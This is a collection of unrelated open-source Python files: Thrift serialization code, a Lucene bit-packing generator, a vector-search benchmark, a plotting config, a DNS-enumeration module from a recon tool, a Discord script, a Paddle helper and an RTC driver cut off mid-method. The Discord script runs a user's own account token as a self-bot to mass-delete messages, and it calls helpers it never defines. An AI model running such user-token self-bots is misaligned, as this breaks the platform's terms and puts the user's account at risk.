iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('closeScanner_args') if self.scannerId is not None: oprot.writeFieldBegin('scannerId', TType.I32, 1) oprot.writeI32(self.scannerId) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.scannerId is None: raise TProtocol.TProtocolException(message='Required field scannerId is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class closeScanner_result: """ Attributes: - io - ia: if the scannerId is invalid """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2 ) def __init__(self, io=None, ia=None,): self.io = io self.ia = ia def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.ia = TIllegalArgument() self.ia.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('closeScanner_result') if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() if self.ia is not None: oprot.writeFieldBegin('ia', TType.STRUCT, 2) self.ia.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other)
lucene/backward-codecs/src/java/org/apache/lucene/backward_codecs/lucene84/gen_ForUtil.py
dameikle/lucene
903
12748420
#! /usr/bin/env python # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from fractions import gcd """Code generation for ForUtil.java""" MAX_SPECIALIZED_BITS_PER_VALUE = 24 OUTPUT_FILE = "ForUtil.java" PRIMITIVE_SIZE = [8, 16, 32] HEADER = """// This file has been automatically generated, DO NOT EDIT /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.lucene.backward_codecs.lucene84; import java.io.IOException; import org.apache.lucene.store.DataInput; import org.apache.lucene.store.DataOutput; // Inspired from https://fulmicoton.com/posts/bitpacking/ // Encodes multiple integers in a long to get SIMD-like speedups. // If bitsPerValue <= 8 then we pack 8 ints per long // else if bitsPerValue <= 16 we pack 4 ints per long // else we pack 2 ints per long final class ForUtil { static final int BLOCK_SIZE = 128; private static final int BLOCK_SIZE_LOG2 = 7; private static long expandMask32(long mask32) { return mask32 | (mask32 << 32); } private static long expandMask16(long mask16) { return expandMask32(mask16 | (mask16 << 16)); } private static long expandMask8(long mask8) { return expandMask16(mask8 | (mask8 << 8)); } private static long mask32(int bitsPerValue) { return expandMask32((1L << bitsPerValue) - 1); } private static long mask16(int bitsPerValue) { return expandMask16((1L << bitsPerValue) - 1); } private static long mask8(int bitsPerValue) { return expandMask8((1L << bitsPerValue) - 1); } private static void expand8(long[] arr) { for (int i = 0; i < 16; ++i) { long l = arr[i]; arr[i] = (l >>> 56) & 0xFFL; arr[16 + i] = (l >>> 48) & 0xFFL; arr[32 + i] = (l >>> 40) & 0xFFL; arr[48 + i] = (l >>> 32) & 0xFFL; arr[64 + i] = (l >>> 24) & 0xFFL; arr[80 + i] = (l >>> 16) & 0xFFL; arr[96 + i] = (l >>> 8) & 0xFFL; arr[112 + i] = l & 0xFFL; } } private static void expand8To32(long[] arr) { for (int i = 0; i < 16; ++i) { long l = arr[i]; arr[i] = (l >>> 24) & 0x000000FF000000FFL; arr[16 + i] = (l >>> 16) & 0x000000FF000000FFL; arr[32 + i] = (l >>> 8) & 0x000000FF000000FFL; arr[48 + i] = l & 0x000000FF000000FFL; } } private static void collapse8(long[] arr) { for (int i = 0; i < 16; ++i) { arr[i] = (arr[i] << 56) | (arr[16 + i] << 48) | (arr[32 + i] << 40) | (arr[48 + i] << 32) | (arr[64 + i] << 24) | (arr[80 + i] << 16) | (arr[96 + i] << 8) | arr[112 + i]; } } private static void expand16(long[] arr) { for (int i = 0; i < 32; ++i) { long l = arr[i]; arr[i] = (l >>> 48) & 0xFFFFL; arr[32 + i] = (l >>> 32) & 0xFFFFL; arr[64 + i] = (l >>> 16) & 0xFFFFL; arr[96 + i] = l & 0xFFFFL; } } private static void expand16To32(long[] arr) { for (int i = 0; i < 32; ++i) { long l = arr[i]; arr[i] = (l >>> 16) & 0x0000FFFF0000FFFFL; arr[32 + i] = l & 0x0000FFFF0000FFFFL; } } private static void collapse16(long[] arr) { for (int i = 0; i < 32; ++i) { arr[i] = (arr[i] << 48) | (arr[32 + i] << 32) | (arr[64 + i] << 16) | arr[96 + i]; } } private static void expand32(long[] arr) { for (int i = 0; i < 64; ++i) { long l = arr[i]; arr[i] = l >>> 32; arr[64 + i] = l & 0xFFFFFFFFL; } } private static void collapse32(long[] arr) { for (int i = 0; i < 64; ++i) { arr[i] = (arr[i] << 32) | arr[64 + i]; } } private static void prefixSum8(long[] arr, long base) { expand8To32(arr); prefixSum32(arr, base); } private static void prefixSum16(long[] arr, long base) { // We need to move to the next primitive size to avoid overflows expand16To32(arr); prefixSum32(arr, base); } private static void prefixSum32(long[] arr, long base) { arr[0] += base << 32; innerPrefixSum32(arr); expand32(arr); final long l = arr[BLOCK_SIZE / 2 - 1]; for (int i = BLOCK_SIZE / 2; i < BLOCK_SIZE; ++i) { arr[i] += l; } } // For some reason unrolling seems to help private static void innerPrefixSum32(long[] arr) { arr[1] += arr[0]; arr[2] += arr[1]; arr[3] += arr[2]; arr[4] += arr[3]; arr[5] += arr[4]; arr[6] += arr[5]; arr[7] += arr[6]; arr[8] += arr[7]; arr[9] += arr[8]; arr[10] += arr[9]; arr[11] += arr[10]; arr[12] += arr[11]; arr[13] += arr[12]; arr[14] += arr[13]; arr[15] += arr[14]; arr[16] += arr[15]; arr[17] += arr[16]; arr[18] += arr[17]; arr[19] += arr[18]; arr[20] += arr[19]; arr[21] += arr[20]; arr[22] += arr[21]; arr[23] += arr[22]; arr[24] += arr[23]; arr[25] += arr[24]; arr[26] += arr[25]; arr[27] += arr[26]; arr[28] += arr[27]; arr[29] += arr[28]; arr[30] += arr[29]; arr[31] += arr[30]; arr[32] += arr[31]; arr[33] += arr[32]; arr[34] += arr[33]; arr[35] += arr[34]; arr[36] += arr[35]; arr[37] += arr[36]; arr[38] += arr[37]; arr[39] += arr[38]; arr[40] += arr[39]; arr[41] += arr[40]; arr[42] += arr[41]; arr[43] += arr[42]; arr[44] += arr[43]; arr[45] += arr[44]; arr[46] += arr[45]; arr[47] += arr[46]; arr[48] += arr[47]; arr[49] += arr[48]; arr[50] += arr[49]; arr[51] += arr[50]; arr[52] += arr[51]; arr[53] += arr[52]; arr[54] += arr[53]; arr[55] += arr[54]; arr[56] += arr[55]; arr[57] += arr[56]; arr[58] += arr[57]; arr[59] += arr[58]; arr[60] += arr[59]; arr[61] += arr[60]; arr[62] += arr[61]; arr[63] += arr[62]; } private static void readLELongs(DataInput in, long[] dst, int offset, int length) throws IOException { in.readLongs(dst, offset, length); for (int i = 0; i < length; ++i) { dst[offset + i] = Long.reverseBytes(dst[offset + i]); } } private final long[] tmp = new long[BLOCK_SIZE / 2]; /** Encode 128 integers from {@code longs} into {@code out}. */ void encode(long[] longs, int bitsPerValue, DataOutput out) throws IOException { final int nextPrimitive; final int numLongs; if (bitsPerValue <= 8) { nextPrimitive = 8; numLongs = BLOCK_SIZE / 8; collapse8(longs); } else if (bitsPerValue <= 16) { nextPrimitive = 16; numLongs = BLOCK_SIZE / 4; collapse16(longs); } else { nextPrimitive = 32; numLongs = BLOCK_SIZE / 2; collapse32(longs); } final int numLongsPerShift = bitsPerValue * 2; int idx = 0; int shift = nextPrimitive - bitsPerValue; for (int i = 0; i < numLongsPerShift; ++i) { tmp[i] = longs[idx++] << shift; } for (shift = shift - bitsPerValue; shift >= 0; shift -= bitsPerValue) { for (int i = 0; i < numLongsPerShift; ++i) { tmp[i] |= longs[idx++] << shift; } } final int remainingBitsPerLong = shift + bitsPerValue; final long maskRemainingBitsPerLong; if (nextPrimitive == 8) { maskRemainingBitsPerLong = MASKS8[remainingBitsPerLong]; } else if (nextPrimitive == 16) { maskRemainingBitsPerLong = MASKS16[remainingBitsPerLong]; } else { maskRemainingBitsPerLong = MASKS32[remainingBitsPerLong]; } int tmpIdx = 0; int remainingBitsPerValue = bitsPerValue; while (idx < numLongs) { if (remainingBitsPerValue >= remainingBitsPerLong) { remainingBitsPerValue -= remainingBitsPerLong; tmp[tmpIdx++] |= (longs[idx] >>> remainingBitsPerValue) & maskRemainingBitsPerLong; if (remainingBitsPerValue == 0) { idx++; remainingBitsPerValue = bitsPerValue; } } else { final long mask1, mask2; if (nextPrimitive == 8) { mask1 = MASKS8[remainingBitsPerValue]; mask2 = MASKS8[remainingBitsPerLong - remainingBitsPerValue]; } else if (nextPrimitive == 16) { mask1 = MASKS16[remainingBitsPerValue]; mask2 = MASKS16[remainingBitsPerLong - remainingBitsPerValue]; } else { mask1 = MASKS32[remainingBitsPerValue]; mask2 = MASKS32[remainingBitsPerLong - remainingBitsPerValue]; } tmp[tmpIdx] |= (longs[idx++] & mask1) << (remainingBitsPerLong - remainingBitsPerValue); remainingBitsPerValue = bitsPerValue - remainingBitsPerLong + remainingBitsPerValue; tmp[tmpIdx++] |= (longs[idx] >>> remainingBitsPerValue) & mask2; } } for (int i = 0; i < numLongsPerShift; ++i) { // Java longs are big endian and we want to read little endian longs, so we need to reverse // bytes long l = Long.reverseBytes(tmp[i]); out.writeLong(l); } } /** Number of bytes required to encode 128 integers of {@code bitsPerValue} bits per value. */ int numBytes(int bitsPerValue) throws IOException { return bitsPerValue << (BLOCK_SIZE_LOG2 - 3); } private static void decodeSlow(int bitsPerValue, DataInput in, long[] tmp, long[] longs) throws IOException { final int numLongs = bitsPerValue << 1; readLELongs(in, tmp, 0, numLongs); final long mask = MASKS32[bitsPerValue]; int longsIdx = 0; int shift = 32 - bitsPerValue; for (; shift >= 0; shift -= bitsPerValue) { shiftLongs(tmp, numLongs, longs, longsIdx, shift, mask); longsIdx += numLongs; } final int remainingBitsPerLong = shift + bitsPerValue; final long mask32RemainingBitsPerLong = MASKS32[remainingBitsPerLong]; int tmpIdx = 0; int remainingBits = remainingBitsPerLong; for (; longsIdx < BLOCK_SIZE / 2; ++longsIdx) { int b = bitsPerValue - remainingBits; long l = (tmp[tmpIdx++] & MASKS32[remainingBits]) << b; while (b >= remainingBitsPerLong) { b -= remainingBitsPerLong; l |= (tmp[tmpIdx++] & mask32RemainingBitsPerLong) << b; } if (b > 0) { l |= (tmp[tmpIdx] >>> (remainingBitsPerLong - b)) & MASKS32[b]; remainingBits = remainingBitsPerLong - b; } else { remainingBits = remainingBitsPerLong; } longs[longsIdx] = l; } } /** * The pattern that this shiftLongs method applies is recognized by the C2 compiler, which * generates SIMD instructions for it in order to shift multiple longs at once. */ private static void shiftLongs(long[] a, int count, long[] b, int bi, int shift, long mask) { for (int i = 0; i < count; ++i) { b[bi + i] = (a[i] >>> shift) & mask; } } """ def writeRemainderWithSIMDOptimize(bpv, next_primitive, remaining_bits_per_long, o, num_values, f): iteration = 1 num_longs = bpv * num_values / remaining_bits_per_long while num_longs % 2 == 0 and num_values % 2 == 0: num_longs /= 2 num_values /= 2 iteration *= 2 f.write(' shiftLongs(tmp, %d, tmp, 0, 0, MASK%d_%d);\n' % (iteration * num_longs, next_primitive, remaining_bits_per_long)) f.write(' for (int iter = 0, tmpIdx = 0, longsIdx = %d; iter < %d; ++iter, tmpIdx += %d, longsIdx += %d) {\n' %(o, iteration, num_longs, num_values)) tmp_idx = 0 b = bpv b -= remaining_bits_per_long f.write(' long l0 = tmp[tmpIdx + %d] << %d;\n' %(tmp_idx, b)) tmp_idx += 1 while b >= remaining_bits_per_long: b -= remaining_bits_per_long f.write(' l0 |= tmp[tmpIdx + %d] << %d;\n' %(tmp_idx, b)) tmp_idx += 1 f.write(' longs[longsIdx + 0] = l0;\n') f.write(' }\n') def writeRemainder(bpv, next_primitive, remaining_bits_per_long, o, num_values, f): iteration = 1 num_longs = bpv * num_values / remaining_bits_per_long while num_longs % 2 == 0 and num_values % 2 == 0: num_longs /= 2 num_values /= 2 iteration *= 2 f.write(' for (int iter = 0, tmpIdx = 0, longsIdx = %d; iter < %d; ++iter, tmpIdx += %d, longsIdx += %d) {\n' %(o, iteration, num_longs, num_values)) i = 0 remaining_bits = 0 tmp_idx = 0 for i in range(num_values): b = bpv if remaining_bits == 0: b -= remaining_bits_per_long f.write(' long l%d = (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits_per_long, b)) else: b -= remaining_bits f.write(' long l%d = (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits, b)) tmp_idx += 1 while b >= remaining_bits_per_long: b -= remaining_bits_per_long f.write(' l%d |= (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits_per_long, b)) tmp_idx += 1 if b > 0: f.write(' l%d |= (tmp[tmpIdx + %d] >>> %d) & MASK%d_%d;\n' %(i, tmp_idx, remaining_bits_per_long-b, next_primitive, b)) remaining_bits = remaining_bits_per_long-b f.write(' longs[longsIdx + %d] = l%d;\n' %(i, i)) f.write(' }\n') def writeDecode(bpv, f): next_primitive = 32 if bpv <= 8: next_primitive = 8 elif bpv <= 16: next_primitive = 16 f.write(' private static void decode%d(DataInput in, long[] tmp, long[] longs) throws IOException {\n' %bpv) num_values_per_long = 64 / next_primitive if bpv == next_primitive: f.write(' readLELongs(in, longs, 0, %d);\n' %(bpv*2)) else: f.write(' readLELongs(in, tmp, 0, %d);\n' %(bpv*2)) shift = next_primitive - bpv o = 0 while shift >= 0: f.write(' shiftLongs(tmp, %d, longs, %d, %d, MASK%d_%d);\n' %(bpv*2, o, shift, next_primitive, bpv)) o += bpv*2 shift -= bpv if shift + bpv > 0: if bpv % (next_primitive % bpv) == 0: writeRemainderWithSIMDOptimize(bpv, next_primitive, shift + bpv, o, 128/num_values_per_long - o, f) else: writeRemainder(bpv, next_primitive, shift + bpv, o, 128/num_values_per_long - o, f) f.write(' }\n') f.write('\n') if __name__ == '__main__': f = open(OUTPUT_FILE, 'w') f.write(HEADER) for primitive_size in PRIMITIVE_SIZE: f.write(' private static final long[] MASKS%d = new long[%d];\n' %(primitive_size, primitive_size)) f.write('\n') f.write(' static {\n') for primitive_size in PRIMITIVE_SIZE: f.write(' for (int i = 0; i < %d; ++i) {\n' %primitive_size) f.write(' MASKS%d[i] = mask%d(i);\n' %(primitive_size, primitive_size)) f.write(' }\n') f.write(' }\n') f.write(' // mark values in array as final longs to avoid the cost of reading array, arrays should only be\n') f.write(' // used when the idx is a variable\n') for primitive_size in PRIMITIVE_SIZE: for bpv in range(1, min(MAX_SPECIALIZED_BITS_PER_VALUE + 1, primitive_size)): if bpv * 2 != primitive_size or primitive_size == 8: f.write(' private static final long MASK%d_%d = MASKS%d[%d];\n' %(primitive_size, bpv, primitive_size, bpv)) f.write(""" /** Decode 128 integers into {@code longs}. */ void decode(int bitsPerValue, DataInput in, long[] longs) throws IOException { switch (bitsPerValue) { """) for bpv in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1): next_primitive = 32 if bpv <= 8: next_primitive = 8 elif bpv <= 16: next_primitive = 16 f.write(' case %d:\n' %bpv) f.write(' decode%d(in, tmp, longs);\n' %bpv) f.write(' expand%d(longs);\n' %next_primitive) f.write(' break;\n') f.write(' default:\n') f.write(' decodeSlow(bitsPerValue, in, tmp, longs);\n') f.write(' expand32(longs);\n') f.write(' break;\n') f.write(' }\n') f.write(' }\n') f.write(""" /** Delta-decode 128 integers into {@code longs}. */ void decodeAndPrefixSum(int bitsPerValue, DataInput in, long base, long[] longs) throws IOException { switch (bitsPerValue) { """) for bpv in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1): next_primitive = 32 if bpv <= 8: next_primitive = 8 elif bpv <= 16: next_primitive = 16 f.write(' case %d:\n' %bpv) f.write(' decode%d(in, tmp, longs);\n' %bpv) f.write(' prefixSum%d(longs, base);\n' %next_primitive) f.write(' break;\n') f.write(' default:\n') f.write(' decodeSlow(bitsPerValue, in, tmp, longs);\n') f.write(' prefixSum32(longs, base);\n') f.write(' break;\n') f.write(' }\n') f.write(' }\n') f.write('\n') for i in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1): writeDecode(i, f) f.write('}\n')
examples/benchmark/run_sift1b.py
abcp4/rii
120
12748464
<reponame>abcp4/rii import numpy as np import pathlib import nanopq import pickle import time import more_itertools import texmex_python import util ### If you'd like to debug, please uninstall rii and uncomment the following lines #import sys #sys.path.append('../../') import rii def run(engine, L, Xq, gt, r): """ Given a searcher, run the search. Return the runtime and the accuracy Args: engine (rii.Rii): Rii search engine L (int): The number of candidates for search Xq (np.array): Query vectors. shape=(Nq, D). dtype=np.float32 gt (np.array): Groundtruth. shape=(Nq, ANY). dtype=np.int32 r (int): Top R Returns: (float, float): Duration [sec/query] and recall@r over the queries """ assert Xq.ndim == 2 assert Xq.dtype == np.float32 Nq = Xq.shape[0] I = np.zeros((Nq, r), dtype=int) t0 = time.time() for i, q in enumerate(Xq): I[i], _ = engine.query(q=q, topk=r, L=L) t1 = time.time() duration = (t1 - t0) / Nq # sec/query recall = util.recall_at_r(I, gt, r) return duration, recall # Setup paths p = pathlib.Path('.') path_train = p / "data/bigann_learn.bvecs" path_base = p / "data/bigann_base.bvecs" path_query = p / "data/bigann_query.bvecs" path_gt = p / "data/gnd/idx_1000M.ivecs" # Read queries and groundtruth Xq = texmex_python.reader.read_bvec(path_query.open("rb")).astype(np.float32) gt = util.ivecs_read(str(path_gt)) # Reat top Nt vectors for training print("Start to read training vectors") Xt = [] Nt = 10000000 # Use top 10M vectors for training with path_train.open("rb") as f: for vec in texmex_python.reader.read_bvec_iter(f): Xt.append(vec) if len(Xt) == Nt: break Xt = np.array(Xt, dtype=np.float32) print("Xt.shape: {}, Xt.dtype: {}".format(Xt.shape, Xt.dtype)) # Train a PQ codec and save it M = 8 # The number of subspace. path_codec = p / 'cache/codec_m{}.pkl'.format(M) if not path_codec.exists(): print("Start to train a codec") codec = nanopq.PQ(M=M, verbose=True).fit(vecs=Xt) pickle.dump(codec, path_codec.open("wb")) print("Dump the codec in {}".format(path_codec)) else: print("Read a codec from cache: {}".format(path_codec)) codec = pickle.load(path_codec.open("rb")) # Construct a search engine path_engine = p / 'cache/engine_m{}.pkl'.format(M) if not path_engine.exists(): print("Start to construct a Rii engine") e = rii.Rii(fine_quantizer=codec) batch_size = 10000000 with path_base.open("rb") as f: for n, batch in enumerate(more_itertools.chunked(texmex_python.reader.read_bvec_iter(f), batch_size)): print("batch: {} / {}".format(n, int(1000000000 / batch_size))) e.add(vecs=np.array(batch, dtype=np.float32)) e.reconfigure() pickle.dump(e, path_engine.open("wb")) print("Dump the engine in {}".format(path_engine)) else: print("Read an engine from cache: {}".format(path_engine)) e = pickle.load(path_engine.open("rb")) e.print_params() # Run search r = 1 # Reacll@r w = 1 # The parameter for search candidates. L = L0 * w = N / nlist * w. The default (fastest) setting is w=1 duration, recall = run(engine=e, L=e.L0 * w, Xq=Xq, gt=gt, r=r) print("{} msec/query. Recall@{} = {}".format(duration * 1000, r, recall))
Trescope4Python/library/src/trescope/config/VectorField3DConfig.py
aaabbb2021/Trescope
105
12748468
from typing import List from trescope.config import Config, AnchorType, AnchorCM from trescope.core.Utils import toListIfNumpyOrTensorArray class VectorField3DConfig(Config): """Config for :py:meth:`trescope.Output.plotVectorField3D`""" def __init__(self): super().__init__() self.__sizeFactor: float = .5 self.__autoScaleByLocation = False self.__colorScale = [[0, 0x88000000], [1, 0x88000000]] self.__x: List[float] = [] self.__y: List[float] = [] self.__z: List[float] = [] self.__anchor: str = str(AnchorCM) def sizeFactor(self, sizeFactor: float): """ Specify size factor . :param sizeFactor: size factor , default .5 :return: self , for chain call """ self.__sizeFactor = sizeFactor return self def anchor(self, anchor: AnchorType): """ Specify anchor type . :param anchor: anchor :return: self , for chain call """ self.__anchor = str(anchor) return self def autoScaleByLocation(self, autoScale: bool): """ Specify auto scale or not . :param autoScale: auto scale , default `False` :return: self , for chain call """ self.__autoScaleByLocation = autoScale return self def locations(self, x: List[float], y: List[float], z: List[float]): """ Specify locations . :param x: x :param y: y :param z: z :return: self , for chain call """ self.__x, self.__y, self.__z = x, y, z return self def color(self, color: int): """ Specify color . :param color: color :return: self , for chain call """ self.__colorScale = [[0, color], [1, color]] return self def toDict(self): return { **super().toDict(), 'sizeFactor': self.__sizeFactor, 'autoScaleByLocation': self.__autoScaleByLocation, 'colorScale': self.__colorScale, 'locationX': toListIfNumpyOrTensorArray(self.__x), 'locationY': toListIfNumpyOrTensorArray(self.__y), 'locationZ': toListIfNumpyOrTensorArray(self.__z), 'anchor': self.__anchor }
modules/dns.py
tomsec/FinalRecon
1,391
12748482
<reponame>tomsec/FinalRecon #!/usr/bin/env python3 import os import dnslib R = '\033[31m' # red G = '\033[32m' # green C = '\033[36m' # cyan W = '\033[0m' # white Y = '\033[33m' # yellow def dnsrec(domain, output, data): result = {} print('\n' + Y + '[!]' + Y + ' Starting DNS Enumeration...' + W + '\n') types = ['A', 'AAAA', 'ANY', 'CAA', 'CNAME', 'MX', 'NS', 'TXT'] full_ans = [] for Type in types: q = dnslib.DNSRecord.question(domain, Type) pkt = q.send('8.8.8.8', 53, tcp='UDP') ans = dnslib.DNSRecord.parse(pkt) ans = str(ans) ans = ans.split('\n') full_ans.extend(ans) full_ans = set(full_ans) dns_found = [] for entry in full_ans: if entry.startswith(';') == False: dns_found.append(entry) else: pass if len(dns_found) != 0: for entry in dns_found: print(G + '[+]' + C + ' {}'.format(entry) + W) if output != 'None': result.setdefault('dns', []).append(entry) else: print(R + '[-]' + C + ' DNS Records Not Found!' + W) if output != 'None': result.setdefault('dns', ['DNS Records Not Found']) dmarc_target = '_dmarc.' + domain q = dnslib.DNSRecord.question(dmarc_target, 'TXT') pkt = q.send('8.8.8.8', 53, tcp='UDP') dmarc_ans = dnslib.DNSRecord.parse(pkt) dmarc_ans = str(dmarc_ans) dmarc_ans = dmarc_ans.split('\n') dmarc_found = [] for entry in dmarc_ans: if entry.startswith('_dmarc') == True: dmarc_found.append(entry) else: pass if len(dmarc_found) != 0: for entry in dmarc_found: print(G + '[+]' + C + ' {}'.format(entry) + W) if output != 'None': result.setdefault('dmarc', []).append(entry) else: print('\n' + R + '[-]' + C + ' DMARC Record Not Found!' + W) if output != 'None': result.setdefault('dmarc', ['DMARC Record Not Found!']) if output != 'None': dns_export(output, data, result) def dns_export(output, data, result): data['module-DNS Enumeration'] = result
Additional_File/16_ClearDM/cleardm.py
nomrsavage/Discord-All-Tools-In-One
197
12748493
import os, os.path, discord from discord.ext import commands from colorama import Fore os.system('cls' if os.name == 'nt' else 'clear') cleardmtitle() print(f"""{y}[{w}+{y}]{w} Enter your token""") token = input(f"""{y}[{b}#{y}]{w} Token: """) print(f"""\n{y}[{b}#{y}]{w} Write "!clear" in one of your DMs to delete your messages""") global bot bot = commands.Bot(command_prefix="!", self_bot=True) bot.remove_command("help") @bot.command() async def clear(ctx, limit: int=None): passed = 0 failed = 0 async for msg in ctx.message.channel.history(limit=limit): if msg.author.id == bot.user.id: try: await msg.delete() passed += 1 except: failed += 1 print(f"\n{y}[{w}+{y}]{w} Removed {passed} messages with {failed} fails") input(f"""\n{y}[{b}#{y}]{w} Press ENTER to exit""") main() bot.run(token, bot=False)
python/paddle/fluid/dygraph/parallel_helper.py
OuyangChao/Paddle
17,085
12748530
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except jin compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from ..layers import collective from ..framework import Parameter __parallel_ctx__clz__ = None def _is_data_parallel_mode(): global __parallel_ctx__clz__ return __parallel_ctx__clz__ is not None and int( os.getenv("PADDLE_TRAINERS_NUM", "1")) > 1 def _is_parallel_ctx_initialized(): global __parallel_ctx__clz__ return __parallel_ctx__clz__ is not None def _set_parallel_ctx(nccl_parallel_context): global __parallel_ctx__clz__ assert __parallel_ctx__clz__ is None, \ "ParallelContext can only be initialized once." __parallel_ctx__clz__ = nccl_parallel_context def _init_parallel_ctx(): global __parallel_ctx__clz__ assert __parallel_ctx__clz__ is not None, \ "ParallelContext should be initialized." __parallel_ctx__clz__.init() def _broadcast_parameters(parameters): for param in parameters: # In model parallel, some parameters are split into multiple devices, # so we could not broadcast these parameters. if param.is_distributed: continue if isinstance(param, Parameter) and param.trainable: collective._broadcast(param, 0, sync_mode=True)
misc/DS1307/DS1307.py
garymeg/mpy-lib
116
12748541
''' DS1307 RTC drive Author: shaoziyang Date: 2018.3 http://www.micropython.org.cn ''' from micropython import const DS1307_I2C_ADDRESS = const(104) DS1307_REG_SECOND = const(0) DS1307_REG_MINUTE = const(1) DS1307_REG_HOUR = const(2) DS1307_REG_WEEKDAY = const(3) DS1307_REG_DAY = const(4) DS1307_REG_MONTH = const(5) DS1307_REG_YEAR = const(6) DS1307_REG_CTRL = const(7) DS1307_REG_RAM = const(8) class DS1307(): def __init__(self, i2c): self.i2c = i2c self.DT = [0] * 8 self.buf = bytearray(8) self.tb = bytearray(1) self.rb = bytearray(1) self.start() # set reg def setReg(self, reg, dat): self.tb[0] = dat self.i2c.writeto_mem(DS1307_I2C_ADDRESS, reg, self.tb) # get reg def getReg(self, reg): self.i2c.readfrom_mem_into(DS1307_I2C_ADDRESS, reg, self.rb) return self.rb[0] def start(self): t = self.getReg(DS1307_REG_SECOND) self.setReg(DS1307_REG_SECOND, t&0x7F) def stop(self): t = self.getReg(DS1307_REG_SECOND) self.setReg(DS1307_REG_SECOND, t|0x80) def DecToHex(self, dat): return (dat//10) * 16 + (dat%10) def HexToDec(self, dat): return (dat//16) * 10 + (dat%16) def datetime(self, DT=None): if DT == None: self.i2c.readfrom_mem_into(DS1307_I2C_ADDRESS, DS1307_REG_SECOND, self.buf) self.DT[0] = self.HexToDec(self.buf[6]) + 2000 self.DT[1] = self.HexToDec(self.buf[5]) self.DT[2] = self.HexToDec(self.buf[4]) self.DT[3] = self.HexToDec(self.buf[3]) self.DT[4] = self.HexToDec(self.buf[2]) self.DT[5] = self.HexToDec(self.buf[1]) self.DT[6] = self.HexToDec(self.buf[0]) self.DT[7] = 0 return self.DT else: self.buf[0] = 0 self.buf[1] = self.DecToHex(DT[6]%60) # second self.buf[2] = self.DecToHex(DT[5]%60) # minute self.buf[3] = self.DecToHex(DT[4]%24) # hour self.buf[4] = self.DecToHex(DT[3]%8) # week day self.buf[5] = self.DecToHex(DT[2]%32) # date self.buf[6] = self.DecToHex(DT[1]%13) # month self.buf[7] = self.DecToHex(DT[0]%100) # year self.i2c.writeto(DS1307_I2C_ADDRESS, self.buf) def year(self, year = None): if year == None: return self.HexToDec(self.getReg(DS1307_REG_YEAR)) + 2000 else: self.setReg(DS1307_REG_YEAR, self.DecToHex(year%100)) def month(self, month = None): if month == None: return self.HexToDec(self.getReg(DS1307_REG_MONTH)) else: self.setReg(DS1307_REG_MONTH, self.DecToHex(month%13)) def day(self, day = None): if day == None: return self.HexToDec(self.getReg(DS1307_REG_DAY)) else: self.setReg(DS1307_REG_DAY, self.DecToHex(day%32)) def weekday(self, weekday = None): if weekday == None: return 